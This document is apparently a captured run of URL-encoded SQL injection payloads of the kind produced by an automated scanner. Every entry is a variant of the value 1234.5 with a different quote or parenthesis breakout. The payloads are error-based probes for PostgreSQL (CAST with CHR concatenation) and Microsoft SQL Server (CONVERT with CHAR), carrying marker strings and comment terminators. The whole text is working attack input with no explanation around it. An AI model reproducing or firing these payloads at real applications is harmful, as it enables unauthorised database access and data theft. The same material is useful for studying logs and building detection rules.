1234.5%22%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22blOq%22%20LIKE%20%22blOq 1234.5%22%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22TbwX%22%20LIKE%20%22TbwX 1234.5%22%29%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22eTqR%22%20LIKE%20%22eTqR 1234.5%22%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22LIRF%22%20LIKE%20%22LIRF 1234.5%25%27%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27GkQE%27%3D%27GkQE 1234.5%00%27%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27eCTe%27%3D%27eCTe 1234.5%27%29%20WHERE%207856%3D7856%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1234.5%22%29%20WHERE%209711%3D9711%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1234.5%29%20WHERE%202149%3D2149%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1234.5%27%20WHERE%206907%3D6907%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1234.5%22%20WHERE%209920%3D9920%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1234.5%20WHERE%205993%3D5993%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27bjxk%27%20FROM%20DUAL%20WHERE%206015%3D6015%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27xJkc%27%20WHERE%207281%3D7281%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20RjoE%20WHERE%204762%3D4762%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27woUf%27%20WHERE%207014%3D7014%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204165%3DCAST%28%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284165%3D4165%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20%23 1234.5%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%27%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%22%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%285607%3D5607 1234.5%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%283918%3D3918 1234.5%29%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%288494%3D8494 1234.5%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27ItZd%27%3D%27ItZd 1234.5%27%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27SwKI%27%3D%27SwKI 1234.5%27%29%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27yXCL%27%3D%27yXCL 1234.5%27%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27DiKe%27%3D%27DiKe 1234.5%27%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27klEA%27%20LIKE%20%27klEA 1234.5%27%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27VEhO%27%20LIKE%20%27VEhO 1234.5%27%29%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27iULh%27%20LIKE%20%27iULh 1234.5%27%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27imeL%27%20LIKE%20%27imeL 1234.5%22%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22ioiJ%22%3D%22ioiJ 1234.5%22%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22HLsu%22%3D%22HLsu 1234.5%22%29%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22KaqC%22%3D%22KaqC 1234.5%22%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22ENaB%22%3D%22ENaB 1234.5%22%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22dqST%22%20LIKE%20%22dqST 1234.5%22%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22bmUj%22%20LIKE%20%22bmUj 1234.5%22%29%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22DxeM%22%20LIKE%20%22DxeM 1234.5%22%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22dvlg%22%20LIKE%20%22dvlg 1234.5%25%27%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27ZEoZ%27%3D%27ZEoZ 1234.5%00%27%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27ZpmM%27%3D%27ZpmM 1234.5%27%29%20WHERE%203341%3D3341%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%22%29%20WHERE%208570%3D8570%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%29%20WHERE%207775%3D7775%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%27%20WHERE%207415%3D7415%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%22%20WHERE%203257%3D3257%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1234.5%20WHERE%209044%3D9044%20AND%209972%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28109%29%2BCHAR%28118%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289972%3D9972%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28112%29%2BCHAR%28119%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 